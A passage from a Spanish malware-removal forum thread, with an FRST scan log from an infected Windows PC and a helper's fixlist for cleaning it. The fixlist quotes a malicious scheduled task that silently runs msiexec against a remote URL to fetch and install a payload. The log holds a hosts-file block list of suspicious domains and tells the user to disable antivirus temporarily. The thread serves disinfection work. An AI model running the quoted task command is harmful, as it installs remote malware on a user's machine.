2019-02-23 17:10 - 2019-02-23 17:10 - 000953344 _____ (The Apache Software Foundation) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\log4net\6ddfb2b833726c76267d06317ffe52d6\log4net.ni.dll
2019-02-23 17:10 - 2019-02-23 17:10 - 001142272 _____ (Scarlet.Crush Productions) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\ScpControl\908d05b469ccc28985c64afd86a6400f\ScpControl.ni.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 000147968 _____ (michaelnoonan) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsInput\00383e8a9f5efe3994c0ab8d91747527\WindowsInput.ni.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 000157696 _____ (Scarlet.Crush Productions) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\ScpControl.Shared\1530244f6d4734cd7318000018cec0ce\ScpControl.Shared.ni.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 001514496 _____ (dbreeze.tiesky.com) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\DBreeze\4b9b94d758541a664f33eedc4cf794ca\DBreeze.ni.dll
2019-02-23 17:12 - 2019-02-23 17:12 - 000304640 _____ () [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\ReactiveSockets\8056aca6765369aa1a0cd54ecdd4700e\ReactiveSockets.ni.dll
2019-02-23 17:13 - 2019-02-23 17:13 - 000613888 _____ (Illusory Studios LLC) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\HidSharp\85fbaab37682bcc1051729321116aac8\HidSharp.ni.dll
2019-02-23 17:13 - 2019-02-23 17:13 - 000345600 _____ (Benjamin Höglinger) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\Libarius\605a5ff34bac6549bcd91723e384f53b\Libarius.ni.dll
2019-02-23 17:13 - 2019-02-23 17:13 - 002726912 _____ (Newtonsoft) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\Newtonsoft.Json\98f76395a0f44c111fc30f44e1701d4a\Newtonsoft.Json.ni.dll
2019-02-23 17:13 - 2019-02-23 17:13 - 000738816 _____ (Galos) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\CSScriptLibrary\bf5108643b80da885725b4fdbd2a0b39\CSScriptLibrary.ni.dll
2019-02-23 17:14 - 2019-02-23 17:14 - 000157184 _____ (Richard Deeming) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\Trinet.Core.IO.Ntfs\dc952062e8884c3283abec3978eee900\Trinet.Core.IO.Ntfs.ni.dll
2019-02-23 17:14 - 2019-02-23 17:14 - 000276992 _____ (MadMilkman) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\MadMilkman.Ini\c9ddf93eb4e8fcd73ed3b532a671f09d\MadMilkman.Ini.ni.dll
2019-02-23 17:14 - 2019-02-23 17:14 - 005444608 _____ (Mono development team) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\Mono.CSharp\733e353213affab70c6016a293b211be\Mono.CSharp.ni.dll
2015-08-28 20:16 - 2015-08-28 20:16 - 003496448 _____ (akeo.ie) [File not signed] C:\Program Files\Nefarius Software Solutions\ScpToolkit\libwdi\amd64\libwdi.dll
2013-08-27 14:32 - 2013-08-27 14:32 - 000747520 _____ (Intel(R) Corporation) [File not signed] C:\Program Files\Intel\iCLS Client\HeciServer.exe
2018-11-13 12:59 - 2016-03-21 21:10 - 000842968 _____ (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [File not signed] C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPI64.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2019-02-20 22:00 - 002097614 _____ C:\Windows\system32\drivers\etc\hosts

127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 texttotalk.org
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 technologievimy.com
127.0.0.1 sharefolder.online
127.0.0.1 install.portmdfmoon.com
127.0.0.1 adkqow01283.pw
127.0.0.1 telechargini.com
127.0.0.1 rothsideadome.pw
127.0.0.1 fffffk.xyz
127.0.0.1 smarttrackk.xyz
127.0.0.1 discretdan.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files\dotnet\;C:\Program Files\Microsoft SQL Server\130\Tools\Binn\
HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\Services: Fax => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: idsvc => 3
MSCONFIG\Services: WinDefend => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ScpToolkit Tray Notifications.lnk => C:\Windows\pss\ScpToolkit Tray Notifications.lnk.CommonStartup
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: Discord => C:\Users\Michael\AppData\Local\Discord\app-0.0.304\Discord.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{DDB8CA69-D62B-4B4E-A911-9D564ABEC7A6}] => (Allow) C:\Program Files\Unity\Editor\Unity.exe (Unity Technologies Aps -> Unity Technologies ApS)
FirewallRules: [{61920AB2-5CED-4165-9184-74A141C5AEC9}] => (Block) C:\Program Files\Unity\Editor\Unity.exe (Unity Technologies Aps -> Unity Technologies ApS)
FirewallRules: [{9184648B-ED69-4E4C-9AE9-6EF72D0F8F55}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{756D4BBE-8D90-493F-BC6E-A6F29E3E4D43}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D6F47F84-6A50-4A31-9F7C-4BB1070FD40D}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{D960CF15-216E-46F5-A6EA-928A6E4983F5}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{453526CF-3245-487C-AFCD-364CE8DAC5C1}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{4925A005-2BF8-4853-A804-6263695B632F}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{C1E50307-4100-4BE1-9D73-C31C59A2EB4D}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{B4BD4A37-2CDF-4472-9EA4-A01E36F92FCF}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{E0C9C79E-82BC-4D82-995E-D2E1810D0932}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{25D51147-50AF-4FC1-8336-CEEFEC1D857C}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0B45B622-A173-468A-9EC0-29030EA1D36B}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{ADEE8CC7-B13B-4FCB-8080-B42F528B4D28}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{5A24A94E-60DB-42E9-BABB-2667E051EB50}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{23ECECA5-8967-4DAD-AAEF-301C8647A2EA}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{21ED4F70-3E28-46FC-853A-477F53F1D71C}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{308D67A3-21F2-4A2F-8C34-8B8869FF7DBB}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{51D3CFBC-466C-4393-A5AE-AAFAC4D2E81D}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DB00FBAB-756B-4F9E-87A8-CE86410EC827}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{6F9182EA-DD3A-4019-88CD-60B0426B6DE4}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{B371CF72-1CDC-442D-B4F3-7370A875618F}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{C1DBEECF-93BB-4D61-BD46-D58D336E8EF7}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{C274F7D4-BF53-4EED-950A-8E2D19339D7D}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{E8F400D7-60AC-44EB-9BE0-24DC2B8AB008}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D3CC16F0-5CB1-4C98-9578-CD95F3078F17}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{C907A5C4-490E-4B25-932C-5E5E5CF0B844}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{AE178F4D-D170-4523-B007-3A44ABCE6298}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6E7020D0-FC1E-4610-BC5D-9F3A9307E01F}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{4C06C9DC-8669-4D3A-A689-E5B82ED1CC18}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{133C69C4-FB4F-472E-B7D5-EE5C4777034E}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{8B72B1AD-F2EE-472B-9E1C-71B7D791A24D}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{9FE7E8B5-44FC-421D-B971-1F8F16ADC567}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{83F860C9-DC64-4DED-A099-4FF46C91DEF2}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D224F60D-B5C2-4D85-A6B2-4FD00621EE4B}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{B3EFB7C4-2D6B-4ECF-B27B-58CB1D1AA74A}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{C4A5DA39-8D31-4881-BF9D-CE0C6ABB1855}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{4FA33F81-C75B-4005-86B4-219940670719}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{13F13E49-A60F-4C89-874C-C094F56055DF}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{7E3C248F-3FCE-4B03-9740-60ED500557DA}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{FCEE6EA1-1443-416D-AB32-55578CF25E4A}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{14BE4BEC-7FAB-48AD-AF3A-CA80237F3163}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{8DC237C8-8FC5-407B-9AA3-2A34AF3E26AE}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{FB1B56CD-536B-4F8D-A17D-9FD752B3AD58}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{F1AF2B0E-454C-4792-B758-A710E9913CE1}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{F0245DDE-9F40-4FF4-8ECB-748966ABEA43}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6FF0181D-BEFE-4988-832A-044E01BB5917}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{32B3E73D-F2B4-4BB2-A4CB-E2F8DAC6E4F7}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{4C935997-E290-4719-8CD9-022F9C8B96E2}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CDD16B92-A4E6-496A-85AF-514C0BA02BE8}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0419B383-0F77-47B4-9C9C-4674156F4AA2}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{6B343856-13A0-4E59-9F30-2BB732DD6683}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0FFF2A47-540B-475F-8D24-7B5637DA9B10}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{5DAFDD8A-0996-4E81-81A9-326FEEEFD7BD}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)

==================== Restore Points =========================

ATTENTION: System Restore is disabled

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/01/2019 01:35:17 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/28/2019 04:59:30 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/27/2019 05:32:54 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/26/2019 04:24:43 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/25/2019 10:46:52 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/25/2019 10:24:38 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/25/2019 08:33:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/25/2019 08:32:17 PM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description: El servicio Windows Search se está deteniendo porque hay un problema con el indizador: The catalog is corrupt.

Detalles:
	El catálogo del índice de contenido está dañado.  (HRESULT : 0xc0041801) (0xc0041801)


System errors:
=============
Error: (02/28/2019 08:43:13 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Installer terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 120000 milisegundos: Reiniciar el servicio.

Error: (02/28/2019 06:53:10 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Installer terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 120000 milisegundos: Reiniciar el servicio.

Error: (02/27/2019 05:43:26 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Se recibió la siguiente alerta irrecuperable: 40.

Error: (02/27/2019 05:43:26 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Se recibió la siguiente alerta irrecuperable: 70.

Error: (02/27/2019 05:43:25 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Se recibió la siguiente alerta irrecuperable: 70.

Error: (02/25/2019 11:03:19 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Installer terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 120000 milisegundos: Reiniciar el servicio.

Error: (02/25/2019 08:32:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Search terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 30000 milisegundos: Reiniciar el servicio.

Error: (02/25/2019 08:32:17 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: El servicio Windows Search se cerró con el error específico de servicio %%-1073473535.


==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i5-3570K CPU @ 3.40GHz
Percentage of memory in use: 59%
Total physical RAM: 7644.62 MB
Available physical RAM: 3106.18 MB
Total Virtual: 8154.8 MB
Available Virtual: 3496.22 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:462.1 GB) (Free:347.58 GB) NTFS
Drive d: (Reservado para el sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: () (Fixed) (Total:469.31 GB) (Free:246.17 GB) NTFS
Drive f: () (Fixed) (Total:447.03 GB) (Free:49.7 GB) NTFS
Drive h: (Reservado para el sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[system with boot components (obtained from drive)]


==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: B29B50F1)
Partition 1: (Not Active) - (Size=469.3 GB) - (Type=07 NTFS)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=462.1 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 447.1 GB) (Disk ID: D8192920)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=447 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================
#9

Hola:

Sigue estos pasos:

1.- Muy Importante >>> Realizar una copia de Seguridad de su Registro.

  • Descarga DelFix en el escritorio de Windows.
  • Clic Derecho, “Ejecutar como Administrador”.
  • En la ventana principal, marca solamente la casilla “Create Registry Backup”.
  • Clic en Run.

Al terminar se abrirá un reporte llamado DelFix.txt, guárdelo por si fuera necesario y cierre la herramienta…

2.- Desactiva Temporalmente tu antivirus.

3.- Abre un nuevo archivo Notepad y copia y pega este contenido:


Start
CloseProcesses:
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
2019-02-20 23:03 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\mwp5plgzgye
2019-02-20 22:58 - 2019-02-20 22:58 - 000000000 ____D C:\Users\Michael\AppData\Roaming\ytvjbkdd0kq
2019-02-20 22:26 - 2019-02-25 20:19 - 000000000 ____D C:\Windows\SysWOW64\qhpduwip
2019-02-20 22:26 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\5fgtl00uoz1
2019-02-20 22:20 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\ex5jjx0e11b
2019-02-20 22:07 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\xazbrsguaeb
2019-02-20 22:03 - 2019-02-20 22:03 - 000003578 _____ C:\Windows\System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150}
2019-02-20 22:03 - 2019-02-20 22:03 - 000003472 _____ C:\Windows\System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863}
2019-02-20 21:51 - 2019-02-20 21:51 - 000000000 ____D C:\ProgramData\{B3627947-F7BF-ABF0-C7EA-7327C70D2A76}
2019-02-20 21:51 - 2019-02-20 21:51 - 000000000 ____D C:\ProgramData\{1CDD8693-086B-044F-1315-CC8813F295D9}
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\3082
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\2052
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1055
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1049
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1046
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1045
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1042
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1041
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1040
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1036
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1033
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1031
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1029
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1028
2019-02-25 23:03 - 2019-02-28 20:43 - 000000000 ____D () C:\Users\Michael\AppData\Local\Temp\ImagingEngine.dll
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
Task: {36862642-B4E0-4EE1-8C8A-BAB564791EF6} - System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150} => "msiexec" -q -i hxxps://refreshnerer711.info/mp2FA19Hb.GWj <==== ATTENTION
Task: {5D11E411-A841-43AC-AF9A-BFF0D70F52BB} - System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863} => C:\Program Files (x86)\Common Files\AiuuuByEYaObo.exe
C:\Program Files (x86)\Common Files\AiuuuByEYaObo.exe

CMD: ipconfig /flushdns
CMD: ipconfig /renew
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
RemoveProxy:
EmptyTemp:
Hosts:
END
  • Lo guardas bajo el nombre de fixlist.txt en el escritorio <<< Esto es muy importante.

Nota: Es necesario que el ejecutable Frst.exe y fixlist.txt se encuentren en la misma ubicación (escritorio) o si no la herramienta no trabajara.

  • Ejecutas Frst.exe.
  • Presionas el botón Fix y aguardas a que termine.
  • La Herramienta guardara el reporte en tu escritorio (Fixlog.txt).
  • Lo pegas en tu próxima respuesta.

Nos comentas .

Salu2.

#10

Hola, aqui va el log del Frst:

Fix result of Farbar Recovery Scan Tool (x64) Version: 01.03.2019
Ran by Michael (01-03-2019 15:39:54) Run:1
Running from C:\Users\Michael\Desktop
Loaded Profiles: Michael (Available Profiles: Michael)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CloseProcesses:
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
2019-02-20 23:03 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\mwp5plgzgye
2019-02-20 22:58 - 2019-02-20 22:58 - 000000000 ____D C:\Users\Michael\AppData\Roaming\ytvjbkdd0kq
